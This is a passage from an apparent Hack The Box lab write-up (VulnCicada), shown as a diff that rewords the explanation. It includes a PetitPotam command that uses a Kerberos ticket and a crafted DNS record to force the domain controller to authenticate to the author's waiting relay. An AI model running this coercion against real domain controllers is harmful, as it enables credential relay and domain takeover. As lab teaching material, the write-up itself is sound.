meringue7/Writeups/HTB/VulnCicada/VulnCicada.md

 [*] Servers started, waiting for connections
 ```

-And the coerce a DC authentication with Petitpotam.
-Notice that I don't put my machine IP but the fake DNS record which point to my machine;
+Finally, I use `Petitpotam` to coerce authentication from the Domain Controller.
+Instead of using my attacker IP, I target the malicious DNS record I created earlier.
+This forces the DC to resolve the fake hostname and send its authentication request directly to my waiting relay.

 ```
 # KRB5CCNAME=rosie.powell.ccache petitpotam.py -d "cicada.vl" "DC-JPQ2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA" "DC-JPQ225.cicada.vl" -k